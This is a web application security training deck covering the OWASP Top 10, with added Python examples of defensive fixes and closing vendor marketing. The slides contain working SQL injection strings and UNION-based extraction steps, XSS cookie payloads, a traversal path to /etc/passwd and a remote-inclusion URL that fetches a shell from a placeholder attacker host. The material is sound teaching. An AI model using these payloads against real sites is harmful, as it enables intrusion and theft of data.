Download - Web Application Security
Session Flow
• What is Web Application Security?
• Security Misconceptions
• Reasons for Attacking Web Applications
• OWASP Top 10 Vulnerabilities
• Security guidelines
• Web Application Security checklist
Need for Cyber Security
• Use of complex computer infrastructure is increasing.
• Use of web applications is increasing.
• Decreasing level of skill set required of hackers.
Problem Illustration
(Figure: a web application stack. Application Layer: Custom Code in front of Databases, Legacy Systems, Web Services, Directories, Human Resources, Billing, and the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions. Network Layer: Firewall, Hardened OS, Web Server, App Server, Firewall. An APPLICATION ATTACK arrow passes through the network layer into the custom code; an Insider sits behind the firewalls.)
Application Layer
• Attacker sends attacks inside valid HTTP requests
• Your custom code is tricked into doing something it should not
• Security requires software development expertise, not signatures
Network Layer
• Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.
• Security relies on signature databases
Security Misconceptions
“The Firewall protects my web server and database”
• Access to the server through ports 80 and 443 makes the webserver part of your external perimeter defense
• Vulnerabilities in the web server software or web applications may allow access to internal network resources
Security Misconceptions
“The IDS protects my web server and database”
• The IDS is configured to detect signatures of various well-known attacks
• Attack signatures do not include those for attacks against custom applications
Security Misconceptions
“SSL secures my site”
• SSL secures the transport of data between the web server and the user’s browser.
• SSL does not protect against attacks against the server and applications.
• SSL is the hacker’s best friend due to the false sense of security it creates
The Source of Problem
“Malicious hackers don’t create security holes; they simply exploit them. Security holes and vulnerabilities – the real root cause of the problem – are the result of bad software design and implementation.”
-John Viega & Gary McGraw
OWASP Top 10 Vulnerabilities
1. Injection Flaws
2. Cross Site Scripting (XSS)
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
Injection Flaws
• Injection means… tricking an application into including unintended commands in the data sent to an interpreter
• Interpreters… take strings and interpret them as commands: SQL, OS Shell, LDAP, XPath, etc.
• SQL injection is still quite common; many applications are still susceptible
SQL Injection Example
(Figure: attacker → HTTP request → Custom Code → Database, with the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions behind the custom code.)
1. Attacker sends data containing SQL fragments: the attacker enters SQL fragments into a web page that uses the input in a query
2. Application sends the modified query to the database, which executes it
3. Attacker views unauthorized data
EXAMPLE: $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";
Injection Flaws
(Figure: the same application stack as before: Network Layer with Firewall, Hardened OS, Web Server, App Server, Firewall; Application Layer with Custom Code in front of Databases, Legacy Systems, Web Services, Directories, Human Resources, Billing and the business functions. An APPLICATION ATTACK flows HTTP request → SQL query → DB Table → HTTP response.)
Injected query: “SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’”
Returned page: Account Summary – Acct: 5424-6066-2134-4334 – Account: / SKU: …
1. Application presents a form to the attacker, all via SSL
2. Attacker sends an attack in the form data
3. Application forwards the attack to the database in a SQL query
4. Database runs the query containing the attack and sends encrypted results back to the application
5. Application decrypts the data as normal and sends the results to the user
SQL Injection
• It is a flaw in "web application" development; it is not a DB or web server problem.
• Most programmers are still not aware of this problem
• A lot of the tutorials & demo “templates” are vulnerable
• Even worse, a lot of solutions posted on the Internet are not good enough.
• In our pen tests over 60% of our clients turn out to be vulnerable to SQL Injection
Business Impacts of SQL Injection
Attackers can…
• Access the entire database schema
• Steal, modify, and delete database contents
• Prevent legitimate access to the database
• Run operating system commands on the database server
• Disclose company proprietary data
SQL Injection
Common vulnerable login query: SELECT * FROM users WHERE login = 'victor' AND password = '123'
(If it returns something then login!)
ASP/MS SQL Server login syntax:
var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
SQL Injection
Injecting Through Strings
formusr = ' or 1=1 --
formpwd = anything
Final query would look like this:
SELECT * FROM users WHERE username = ' ' or 1=1 -- AND password = 'anything'
SQL Injection
The Power of ‘
• It closes the string parameter.
• Everything after it is considered part of the SQL command.
SELECT * FROM clients WHERE account = 12345678 AND pin = 1111
PHP/MySQL login syntax:
$sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
SQL Injection
Injecting Numeric Fields
$formacct = 1 or 1=1 #
$formpin = 1111
Final query would look like this:
SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
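The string and numeric injections above share one root cause: the user's input is pasted into the SQL text, so the database parses it as part of the command. The following added example (not from the slides, written in Python with the standard sqlite3 module rather than the slides' ASP/PHP) builds a constructed users/clients database, reproduces the vulnerable concatenation for both the string and the numeric case, and puts the fix beside it: bound parameters, plus a type check for the numeric field. The table contents, the account numbers and the function names are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory database mirroring the slides' users/clients tables.
    Passwords are stored in clear here only because the slide's query compares
    them that way; a real application stores a password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('victor', '123')")
    conn.execute("CREATE TABLE clients (account INTEGER, pin INTEGER)")
    conn.executemany("INSERT INTO clients VALUES (?, ?)",
                     [(12345678, 1111), (1, 2222)])
    conn.commit()
    return conn


def login_vulnerable(conn, formusr, formpwd):
    # Same pattern as the slide's ASP/PHP code: input is glued into the SQL
    # text, so a quote in formusr ends the string literal and the rest of the
    # input is parsed as SQL ("' or 1=1 --" comments out the password check).
    sql = ("SELECT * FROM users WHERE login = '" + formusr +
           "' AND password = '" + formpwd + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, formusr, formpwd):
    # Fix for string fields: placeholders. The values travel separately from
    # the statement, so they are only ever compared as data, never parsed.
    sql = "SELECT * FROM users WHERE login = ? AND password = ?"
    return conn.execute(sql, (formusr, formpwd)).fetchall()


def lookup_vulnerable(conn, formacct, formpin):
    # Numeric fields have no quote to close, so "1 or 1=1 --" goes straight
    # into the WHERE clause and matches every row.
    sql = ("SELECT * FROM clients WHERE account = " + formacct +
           " AND pin = " + formpin)
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, formacct, formpin):
    # Fix for numeric fields: validate the type first (only digits accepted,
    # anything else is rejected outright), then bind the integers.
    if not (formacct.isdigit() and formpin.isdigit()):
        return []
    sql = "SELECT * FROM clients WHERE account = ? AND pin = ?"
    return conn.execute(sql, (int(formacct), int(formpin))).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login :", login_vulnerable(db, "' or 1=1 --", "anything"))
    print("parameterized    :", login_parameterized(db, "' or 1=1 --", "anything"))
    print("vulnerable lookup:", lookup_vulnerable(db, "1 or 1=1 --", "1111"))
    print("parameterized    :", lookup_parameterized(db, "1 or 1=1 --", "1111"))
```

The vulnerable login returns victor's row for the injected username, and the vulnerable lookup returns both client rows; the parameterized versions return nothing for the same inputs and still find the real user and the real account when given genuine credentials. Note that sqlite uses `--` for comments where the slide's MySQL example uses `#`; the mechanism is identical.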
SQL Injection
• Standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database.
• When you click a link like this,
• www.site.com/news.asp?ArticleID=10,
• the link tells the site to look in the table that stores the article names for an article whose "ArticleID" is 10.
SQL Injection
• The "INFORMATION_SCHEMA" holds the names of every table and column on a site.
• On every SQL server there will be an "INFORMATION_SCHEMA" and its name will never change.
Understanding Error Messages
• Example : www.site.com/index.php?id=1
• Add ' or /* after id=1 to check whether the site is vulnerable or not.
• If the site gives an error or a blank page, then the site is vulnerable to SQL injection.
Finding out Vulnerable Columns
• Example : www.site.com/index.php?id=1+order+by+1 --
• Increase the order value until you get an error message something like
“Unknown Column in ‘Order’ Clause”
Extracting Information from database
www.site.com/index.php?id=1+union+all+select+1,table_name,3,4,5,6,7+from+information_schema.tables
• The above mentioned query gives the names of tables stored in the database.
www.site.com/index.php?id=1+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_schema=char()
• The above mentioned query gives names of tables stored in the database.
XSS ( Cross Site Scripting)
• Occurs any time… raw data from an attacker is sent to an innocent user
• Raw data… stored in a database; reflected from web input (form field, hidden field, URL, etc.); sent directly into a rich JavaScript client
• Virtually every web application has this problem
• Try this in your browser – javascript:alert(document.cookie)
Reflected XSS
http://www.boi.com Search-field input is often reflected back to user.
<script>alert(document.cookie)</script>
Site reflects the script back to user where it executes and displays the session cookie in a pop-up.
Business Impact of XSS
Attackers can…
• Steal user sessions for complete account takeover
• Steal data on web pages viewed by the victim
• Deface pages viewed by the victim
• Use web pages for phishing
Finding XSS
• Most common locations: blogs, forums, shout boxes, comment boxes, search boxes; there are too many to mention.
• Using 'Google Dorks', search inurl:"search.php?q="
• XSS Examples
http://site.com/search.php?q=<script>alert("XSS")</script>
http://site.com/search.php?q=<script>window.open( "http://www.google.com/" )</script>
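Both example URLs work only because the search page writes the raw q parameter back into the HTML. The added example below (not from the slides; Python is used as a stand-in for whatever server language renders the page) shows the vulnerable reflection beside the fix, contextual output encoding for an HTML text node, and adds the cookie flag that blunts the alert(document.cookie) proof of concept. The page template, the cookie name and the function names are assumptions made for the demonstration; the two payload strings are the ones from the slide.

```python
import html

# The two reflected-XSS inputs shown on the slide, used here as test input.
PAYLOADS = [
    '<script>alert("XSS")</script>',
    '<script>window.open( "http://www.google.com/" )</script>',
]


def render_results_vulnerable(query):
    # Reflects the raw search term into the page: a <script> in the term
    # becomes a real script element when the victim's browser parses the page.
    return "<p>Results for: " + query + "</p>"


def render_results_safe(query):
    # Contextual output encoding for an HTML text node: <, >, &, " and '
    # become entities, so the browser displays the text instead of running it.
    # (Attribute, URL and JavaScript contexts each need their own encoder;
    # this function is only correct for element content.)
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def contains_script_tag(page_html):
    # Crude check used here only to make the difference visible in tests.
    return "<script" in page_html.lower()


def session_cookie_header(session_id):
    # HttpOnly keeps the cookie out of document.cookie, which is exactly what
    # the alert(document.cookie) proof of concept reads; Secure restricts it to
    # HTTPS; SameSite=Lax stops most cross-site sending. Cookie name assumed.
    return ("Set-Cookie: sessionid=" + session_id +
            "; HttpOnly; Secure; SameSite=Lax; Path=/")


if __name__ == "__main__":
    for p in PAYLOADS:
        print("raw    :", render_results_vulnerable(p))
        print("encoded:", render_results_safe(p))
    print(session_cookie_header("example-session-id"))
```

The encoded output still shows the attacker's text to the user, but as text; the script never executes. Encoding at output time is the fix the page's "Input validation" checklist item is pointing at, and it has to be applied in every place a stored or reflected value is written into a page, not only on the search field.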
Case Study: XSS
A British researcher, Jim Ley, discovered (2004) an XSS flaw in Google and provided this proof of concept phishing page where Google becomes a ‘paying service’: if you would be so kind as to provide your credit card details. Now fixed.
Stored XSS
(Figure: application with a stored XSS vulnerability; Custom Code in front of the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions.)
1. Attacker sets the trap – “update my profile”: the attacker enters a malicious script into a web page that stores the data on the server
2. Victim views the page – sees the attacker’s profile: the script runs inside the victim’s browser with full access to the DOM and cookies
3. Script silently sends the attacker the victim’s session cookie
Insecure Direct Object Reference - LFI
• The simplest way to see if a script is vulnerable to local file inclusion is this:
• index.php?page=../../../../../../../../../etc/passwd
• That shows the complete user information on that server with paths.
• Where ../ causes the script to move up one directory,
• Multiple ../ cause the script to move to the top level directory (/, the root of the filesystem), and /etc/passwd is the Unix passwd file.
Malicious File Inclusion - RFI
• Malicious file execution vulnerabilities are found in many applications.
• Developers will often directly use or concatenate potentially hostile input with file or stream functions, or improperly trust input files.
• On many platforms, frameworks allow the use of external object references, such as URLs or file system references.
• When the data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server.
Malicious File Inclusion Illustration
(Figure: attacker → Custom Code → File System, with the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions behind the custom code.)
1. Attacker sends a request that specifies the path to a malicious file in a parameter: the attacker changes a parameter which is supplied to a file inclusion function
2. PHP application includes the specified file and executes the contents
3. Attacker views the results of executing the attack, or takes control of the affected server
Business Impact of RFI
This allows attackers to perform:
• Remote code execution
• Remote root kit installation and complete system compromise
• Remote shell installation
• Remote modification & deletion of files on the server
RFI
If allow_url_include is on in php.ini, we can inject a shell directly.
You only need to load by GET or POST directly to a URI with the shell (using a non-PHP extension).
Like http://www.techdefence.com/index.php?page=news.php
Now if index.php has a Remote File Inclusion like
<?php include($_GET['page']); ?>
then the above URL is written like http://www.techdefence.com/index.php?page=http://www.evilscript.com/shell.txt
Fixing RFI
• Practice Secure Coding Techniques
• Instead of using $_GET use $_POST
• Filter all the pages and Give file permissions perfectly so that no one can access.
• Keep Safe Mode On in PHP.
• Disallow unused commands in the Linux environment
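The LFI and RFI slides above both come down to one line, include($_GET['page']), that trusts the parameter to name a file. The added example below (not from the slides; Python standing in for PHP) shows the two resolution strategies a defender would put in front of such an include: a strict allow-list that maps parameter values to known files, and, for sites with many pages, a containment check that refuses URLs and verifies the normalised path still lies inside the template directory. The directory, the page table and the function names are assumptions made for the demonstration; the two rejected inputs are the ones the slides show.

```python
import os

# Assumed location of the files the application is allowed to include.
TEMPLATE_DIR = "/var/www/app/pages"

# Constructed allow-list: parameter value -> file name. Anything not listed
# here (paths, URLs, "../" sequences) is refused before any include happens.
ALLOWED_PAGES = {
    "news": "news.php",
    "about": "about.php",
}


def resolve_page_allowlist(page):
    """Strict form: the parameter is a key, never a path. Returns None on refusal."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        return None
    return os.path.join(TEMPLATE_DIR, filename)


def resolve_page_contained(page):
    """Looser form for sites with many pages: refuse anything that looks like a
    URL or an absolute path, normalise the rest, and require the result to stay
    inside TEMPLATE_DIR. Returns None on refusal."""
    # Remote inclusion (http://, ftp://, php:// ...) is refused outright, which
    # is the application-level counterpart of allow_url_include=Off.
    if "://" in page or page.startswith(("/", "\\")):
        return None
    candidate = os.path.normpath(os.path.join(TEMPLATE_DIR, page))
    # After normalisation, "../" sequences have been collapsed; the path must
    # still be under the template directory. (A production version would also
    # resolve symlinks with os.path.realpath before this comparison.)
    if os.path.commonpath([TEMPLATE_DIR, candidate]) != TEMPLATE_DIR:
        return None
    if not candidate.endswith(".php"):
        return None
    return candidate


if __name__ == "__main__":
    for p in ["news", "news.php",
              "../../../../../../../../../etc/passwd",
              "http://www.evilscript.com/shell.txt"]:
        print(repr(p), "->", resolve_page_allowlist(p), "|", resolve_page_contained(p))
```

The allow-list is the version to prefer: it needs no path reasoning at all, and the "Filter all the pages" advice in the fix list becomes a two-line table. The containment check is there for the case where the table would be too large to maintain; note that it refuses the traversal payload because normalisation pulls the path out of the template directory, not because it looks for the string "../".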
Information Leakage and Improper Error Handling
• Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems.
• Applications can also leak internal state via how long they take to process certain operations, or via different responses to differing inputs, such as displaying the same error text with different error numbers.
• Web applications will often leak information about their internal state through detailed or debug error messages.
Information Leakage and Improper Error Handling
• Fixing Information Leakage & Improper Error Handling
• Ensure that the entire software development team shares a common approach to exception handling.
• Disable or limit detailed error handling. In particular, do not display debug information, stack traces, or path information to end users.
• Ensure that secure paths that have multiple outcomes return similar or identical error messages in roughly the same time.
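The three fixes above translate into two small pieces of code, shown here as an added example (not from the slides; Python used as a generic stand-in): a central error handler that logs the full exception under a reference id and returns only a generic message, and a login check whose two failure outcomes (unknown user, wrong password) produce the same text and do the same amount of work. The user table, the hashing scheme and the function names are assumptions made for the demonstration; a real application would use a password KDF such as bcrypt or Argon2 where SHA-256 is used here.

```python
import hashlib
import hmac
import logging
import uuid

log = logging.getLogger("app")


def error_response(exc):
    """Common exception handler for every request path.
    Detail (type, message, stack trace) goes to the server log under a
    reference id; the client gets a fixed message plus the id to quote."""
    ref = uuid.uuid4().hex[:12]
    log.error("request failed [ref=%s]: %r", ref, exc, exc_info=exc)
    return {"status": 500, "body": "An error occurred (ref " + ref + ")."}


# Constructed user table: login -> hash. SHA-256 stands in for a real KDF.
USERS = {"victor": hashlib.sha256(b"123").hexdigest()}
# Hash compared against when the user does not exist, so an unknown login
# costs the same as a wrong password and cannot be told apart by timing.
DUMMY_HASH = hashlib.sha256(b"not-a-real-user").hexdigest()

LOGIN_FAILED = "Invalid username or password."   # one message for both outcomes


def check_login(username, password):
    stored = USERS.get(username, DUMMY_HASH)
    supplied = hashlib.sha256(password.encode()).hexdigest()
    # compare_digest runs in time independent of where the strings differ;
    # the membership test afterwards makes sure the dummy hash never "wins".
    matched = hmac.compare_digest(stored, supplied)
    if not matched or username not in USERS:
        return LOGIN_FAILED
    return "OK"


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    try:
        open("/var/www/app/config/db.ini")      # assumed path, fails here
    except OSError as e:
        print(error_response(e))                # user sees no path, no exception type
    print(check_login("victor", "123"))
    print(check_login("victor", "wrong"))
    print(check_login("nobody", "wrong"))       # identical to the line above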
Failure to restrict URL Access
• Frequently, the only protection for a URL is that links to that page are not presented to unauthorized users.
• However, a motivated, skilled, or just plain lucky attacker may be able to find and access these pages, invoke functions, and view data.
Fixing Failure to restrict URL Access
• Ensure the access control matrix is part of the business, architecture, and design of the application
• Ensure that all URLs and business functions are protected by an effective access control mechanism.
• Pay close attention to include/library files.
• Do not assume that users will be unaware of special or hidden URLs or APIs
• Keep up to date with virus protection and patches
Vulnerability Scanners
• Acunetix Vulnerability Scanner
• W3af Vulnerability Scanner
• AppScan Vulnerability Scanner
Security Guidelines
1. Validate Input and Output
2. Fail Securely (Closed)
3. Keep it Simple
4. Use and Reuse Trusted Components
5. Defense in Depth
6. Only as Secure as the Weakest Link
7. Security By Obscurity Won't Work
8. Least Privilege
9. Compartmentalization (Separation of Privileges)
Validate Input & Output
• All user input and user output should be checked to ensure it is both appropriate and expected.
• Allow only explicitly defined characteristics and drop all other data.
Fail Securely
• When it fails, it fails closed.
• It should fail to a state that rejects all subsequent security requests.
• A good analogy is a firewall. If a firewall fails it should drop all subsequent packets.
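The "Failure to Restrict URL Access" fixes and the Fail Securely guideline meet in one piece of code: a central access-control matrix consulted for every request, where an unlisted URL, a missing session or an error while evaluating the rules all produce "deny". The added example below (not from the slides; Python used as a generic stand-in for the application framework) shows such a matrix with default-deny and path normalisation, so a hidden URL is refused even to an administrator until someone adds a rule for it. The URL patterns, the roles and the function names are assumptions made for the demonstration.

```python
import posixpath
from fnmatch import fnmatchcase

# Constructed access-control matrix: URL pattern -> roles allowed.
# Anything not listed is denied (default deny), which is the "fail closed"
# behaviour the Fail Securely guideline describes. Rules are checked in
# order; the first matching pattern decides.
ACCESS_MATRIX = [
    ("/public/*",  {"anonymous", "user", "admin"}),
    ("/account/*", {"user", "admin"}),
    ("/admin/*",   {"admin"}),
]


def is_allowed(url, role):
    """Decide purely from the matrix. No rule matched -> False."""
    # Normalise first so "/account/../admin/users" is judged as "/admin/users"
    # and cannot be routed past the /admin rule by a traversal sequence.
    path = posixpath.normpath(url.split("?", 1)[0])
    for pattern, roles in ACCESS_MATRIX:
        if fnmatchcase(path, pattern):
            return role in roles
    return False


def authorize(url, session):
    """Entry point called for every request, before any business function.
    A missing session is treated as anonymous; any exception while deciding
    (a malformed session object, a broken rule) is treated as deny."""
    try:
        role = session.get("role", "anonymous") if session else "anonymous"
        return is_allowed(url, role)
    except Exception:
        return False


if __name__ == "__main__":
    print(authorize("/public/index", None))                        # True
    print(authorize("/admin/users", {"role": "user"}))             # False
    print(authorize("/admin/users", {"role": "admin"}))            # True
    print(authorize("/admin_backup/export", {"role": "admin"}))    # False: no rule
    print(authorize("/account/../admin/users", {"role": "user"}))  # False: normalised
```

The unlisted /admin_backup/export is the interesting case: the slide warns not to rely on users being unaware of hidden URLs, and with default deny an unlisted page is unreachable rather than wide open. The exception path is the firewall analogy: when the decision itself fails, no traffic passes.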
Keep It Simple
• If a security system is too complex for its user base, it will either not be used or users will try to find measures to bypass it.
• This message applies equally to tasks that an administrator must perform in order to secure an application.
• This message is also intended for security layer APIs that application developers must use to build the system.
Use & Reuse Components
• Using and reusing trusted components makes sense both from a resource stance and from a security stance.
• When someone else has proven they got it right, take advantage of it.
Defence In Depth
• Relying on one component to perform its function 100% of the time is unrealistic.
• While we hope to build software and hardware that works as planned, predicting the unexpected is difficult. Good systems don't predict the unexpected, but plan for it.
Only as Secure as the Weakest Link
• Careful thought must be given to what one is securing.
• Attackers are lazy and will find the weakest point and attempt to exploit it.
Security By Obscurity Won't Work
• It's naive to think that hiding things from prying eyes doesn't buy some amount of time.
• This strategy doesn't work in the long term and has no guarantee of working in the short term.
Least Privilege
• Systems should be designed in such a way that they run with the least amount of system privilege they need to do their job.
Compartmentalization (Separation of Privileges)
• Compartmentalizing users, processes and data helps contain problems if they do occur.
• Compartmentalization is an important concept widely adopted in the information security realm.
Web Application Vulnerability Checklists
• Parameter CheckList
• URL request
• URL encoding
• Query string
• Header
• Cookie
• Form field
• Hidden field
• Client side validation
• ‘Tainted’ parameters
• Min/Max lengths
• Concatenate commands
• Determine policies for access to content and functions.
Session Management
• Token protection
• Session duration
• Idle time duration
• Guess session ID format
• Transfer in URL or BODY?
• Is session ID linked to the IP address?
• Change Referrer tag
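The session-management checklist is easier to apply with a concrete reference in mind. The added example below (not from the slides; Python used as a generic stand-in for the framework's session layer) is a minimal server-side session store that answers the first four items: ids come from the operating system's CSPRNG so their format cannot be guessed, an absolute duration and an idle timeout are enforced on every lookup, and the id is regenerated after login so a token captured beforehand is useless. The timeout values, the clock injection and the class name are assumptions made for the demonstration.

```python
import secrets
import time

SESSION_MAX_AGE = 8 * 3600    # absolute session duration in seconds (assumed policy)
SESSION_IDLE_MAX = 15 * 60    # idle timeout in seconds (assumed policy)


class SessionStore:
    """Server-side session table keyed by an unguessable id.
    `clock` is injectable so expiry can be tested without waiting."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}

    def create(self, user):
        # 32 random bytes from the OS CSPRNG, URL-safe base64 encoded: no
        # sequence, no timestamp, nothing to "guess the session ID format" from.
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def lookup(self, sid):
        """Return the user for a live session, or None (expired ids are removed)."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if (now - s["created"] > SESSION_MAX_AGE or
                now - s["last_seen"] > SESSION_IDLE_MAX):
            del self._sessions[sid]      # expired: fail closed, drop it
            return None
        s["last_seen"] = now
        return s["user"]

    def regenerate(self, sid):
        """Issue a fresh id for an existing session (after login or a privilege
        change) so an id obtained earlier no longer refers to anything."""
        s = self._sessions.pop(sid, None)
        if s is None:
            return None
        new_sid = secrets.token_urlsafe(32)
        self._sessions[new_sid] = s
        return new_sid

    def destroy(self, sid):
        """Logout: remove the session server-side, not just the cookie."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("victor")
    print("id:", sid, "->", store.lookup(sid))
    new_sid = store.regenerate(sid)
    print("old id after regenerate:", store.lookup(sid), "| new id:", store.lookup(new_sid))
```

The remaining checklist items are delivery questions rather than store logic: the id should travel in a cookie (with the HttpOnly and Secure flags) rather than in the URL, where it ends up in logs and Referer headers, and binding it to the client IP address is a trade-off, since mobile and proxied clients change address legitimately.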
Backend Authentication
• Trust relationships
• Encryption
• Plaintext password in HTML
• Password in configuration file
XSS
• Which type – stored or reflected?
• Check 404/500 error pages for returned information.
• Input validation.
Misconfiguration
• Nikto results
• Nessus results
• Patch level
• Directory listing
• Directory permissions
• Error messages
• Default username/password
• SSL certificate configuration
• Debug or configuration files
• Check for latest vulnerabilities
SQL Injection
• Mirror the website and search for all input parameters
• Gain database-related information
• Error messages
• Privileges given to the web server or database
Access Points
• Ability to brute force at the discovered access points
• Ability to bypass authentication with spoofed tokens
• Ability to conduct a replay attack
• Forced browsing: does the application keep a check by tracking requests from each user?
Need For Cyber Security
• Information is an asset of any organization. Any breach in information security can affect the image/reputation of the organization.
• Lack of cyber security awareness among netizens.
• 10% of total netizens are aware about hacking & hackers.
• 5% of total law enforcement agency staff are well trained to tackle cyber crime.
• Recent surveys show a 200% increase in cyber crime.
TechDefence Consulting Pvt Ltd
• Vision :
To make a lasting impression and carve a special space for ourselves as a trusted and globally accepted security service provider.
• Mission:
To affirm our vision of being a global security service provider, TechDefence Consulting aims to deliver timely, efficient, quality-conscious and cost-effective security solutions through our team of certified security professionals to organizations across the globe, and to assist as well as ensure that their systems and processes are totally secure and stable from any threat whatsoever.
Our Global Presence
• India Offices:
Ahmedabad, V.V.Nagar, Nasik, Pune,Hyderabad
• International Offices:
Mauritius, Australia
Our Services
TechInvestigations – A Cyber Crime Investigation unit
“ If you want to catch Criminal then Think like “one”
• Analysing, investigating and accumulating the digital evidence and cyber trails is better known as Cyber Crime Investigation. It can be found in computer hard disks, cell phones, CDs, DVDs, floppies, computer networks, the Internet etc.
• Make Law Enforcement or Government Agencies aware of the various Cyber Crimes.
• Guide them – how to prevent Cyber Crimes?
• Solve Cyber Crime cases using our technical expertise for Law Enforcement Agencies.
• Aid them to legally resolve and bring the Cyber Criminals (people who commit Cyber Crimes) to justice.
Our Services
TechInvestigation – A Cyber Crime Investigation unit
Our Recent Cases:
• Ahmedabad Serial Bomb Blast Terror Mail case – Traced out Terror Mail trail of Ahmedabad Serial Bomb Blast case.
• Cyber Investigation of Mumbai Blasts – We have successfully accomplished task of getting confidential information from JAMAT UD DAWAH.
Our Services
TechHackscan – A Vulnerability Assessment & Penetration Testing unit
“Where you will see the facilities, we see the flaws”
• As penetration tester & website security auditor, we evaluate the security of clients’ websites through simulation of a controlled and managed intrusion into your system by a malicious user, known as a cracker.
• We will assure that our active analysis of the websites for any potential vulnerability that may result from poor or improper system configuration or development is going to be carried out.
• We submit a developer report as well as a remediation report.
Our Services
TechForensics – A Cyber Forensics Unit
• With the right application of science and technology for acquisition, preservation, identification, analysis, and presentation of digital evidence or data, we preserve the integrity of the digital information, blending it with legal acceptability.
• We provide the highest quality instructor-interactive training to help legal firms, accounting firms, government and law enforcement agencies for better performance in cyber forensic matters.
• We can also work on framework development for Cyber Forensics Labs (CFL)
Our Services
Training & Workshops
• TechDefence Certified Cyber Security Expert.
• NASSCOM predicts a requirement of 1,88,000 security professionals by 2010; currently the number of security professionals in India is around 22,000.
• CCSE is a career-oriented hands-on training program on Advanced Ethical Hacking, Cyber Crime Investigation, Cyber Forensics & Penetration Testing.
Our Clients
Private Sector – VAPT
• Computer Clinic – Mauritius
• Multievents Ltd – Mauritius
• Noble Ventures – USA
• Future Group
• Mid Day, Delhi
Govt Sector
• Crime Branch, Ahmedabad• ATS, Mumbai• URICM, Gandhi Nagar• Chief Minister’s Office, Government of Gujarat
Our Clients
Corporate Workshops – Hackintosh 2009
• YAHOO!
• Google
• K7 Antivirus
• ZOHO
• KPMG
• HCL
• TCS
• Deloitte
• ISACA
• Temenos
TechDefence Labs
• A Research & Development unit focusing on Secure Software Development, Client Security Products and Security Product Development.
• TechDefence projects on offer:
• HIDS (Host-based Intrusion Detection System)
• Centralized Cyber Café Monitoring & Reporting System
• File Encrypter
• Online VAPT Scanner
• Online Multi Antivirus Scanner